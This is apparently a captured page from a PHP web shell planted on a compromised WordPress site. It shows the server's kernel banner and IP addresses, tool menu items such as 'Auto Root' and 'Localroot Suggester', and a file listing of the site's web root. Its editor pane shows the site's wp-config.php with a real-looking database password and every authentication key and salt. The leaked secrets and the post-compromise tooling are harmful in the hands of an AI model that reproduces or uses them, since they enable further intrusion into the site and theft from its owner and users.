Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.55
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
emadteam /
public_html /
mag /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-admin
[ DIR ]
drwxr-xr-x
2026-08-05 09:47
wp-content
[ DIR ]
drwxr-xr-x
2026-08-05 09:47
wp-includes
[ DIR ]
drwxr-xr-x
2026-08-05 09:47
.htaccess
237
B
-r-xr-xr-x
2026-08-05 09:47
.htaccess.bk
662
B
-rw-r--r--
2025-02-09 17:00
error_log
5.72
KB
-rw-r--r--
2025-02-08 19:37
index.php
405
B
-rw-r--r--
2020-02-06 10:03
license.txt
19.44
KB
-rw-r--r--
2026-06-04 15:32
readme.html
7.23
KB
-rw-r--r--
2026-06-04 15:32
wp-activate.php
7.2
KB
-rw-r--r--
2026-06-04 15:32
wp-blog-header.php
351
B
-rw-r--r--
2020-02-06 10:03
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-06-14 17:41
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-04 02:25
wp-config.php
3.25
KB
-rw-rw-rw-
2025-02-09 17:00
wp-cron.php
5.49
KB
-rw-r--r--
2024-11-14 02:38
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-04 02:25
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 03:03
wp-login.php
50.63
KB
-rw-r--r--
2026-06-04 15:32
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-04 02:25
wp-settings.php
31.88
KB
-rw-r--r--
2026-06-04 15:32
wp-signup.php
33.81
KB
-rw-r--r--
2026-06-04 15:32
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-04 02:25
xmlrpc.php
3.13
KB
-rw-r--r--
2025-06-17 15:02
Save
Rename
<?php define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'emadteam_mag' ); /** Database username */ define( 'DB_USER', 'emadteam_mag' ); /** Database password */ define( 'DB_PASSWORD', 'ok8T1tn2gdhj' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'ATwrjC;H[^=tT/[n$X4a<bNB#$<(WoZ&WS{0UIQ3ih>]4AJD} +Mwan #RZ4r_=e' ); define( 'SECURE_AUTH_KEY', '):uebY`&Wsa~|A4mcwRFR8l)&zV[o*XT[2!{k{ptd*yx0Ua5VFDP3-u`M3P!$XY#' ); define( 'LOGGED_IN_KEY', 'u.![jN&$nq.QkW/F%1==BP>E!R-f5[)}}h[y hc;T;!x/k`)Q8;>gN8A#G;u%COn' ); define( 'NONCE_KEY', 'AF&4c!x.2]!:H1}x;bS$REH{[&bOq&6(ojuI-yuA<7,a}JjP/Dv`y{`l)jR|m8[ ' ); define( 'AUTH_SALT', '#jx!S08[$tH*g%qP}N~$<f %g<$R8_:y@P:.$|#D|*@Nhl4BzEPR7Bxt#lp_X},r' ); define( 'SECURE_AUTH_SALT', '/m:`#`5j`#iWFBL4H2afq]jOJkj@ZZpD7z`0eKk06.{_RSEUP~iT%I&:je:~nt~)' ); define( 'LOGGED_IN_SALT', 'Rf[d2xi~`w `:#w%~w.,;:xgwTpJM@,*igd<}s@P(Rd#TC^uWeIh{:15_?9pJZ:!' ); define( 'NONCE_SALT', 'i]$T+U,`RGPby(#p4G~1,kQ+[d-Gk}#i9RjvaWpZ=M#f5X(&YD^V]?IkatSM[~`B' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'mag_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';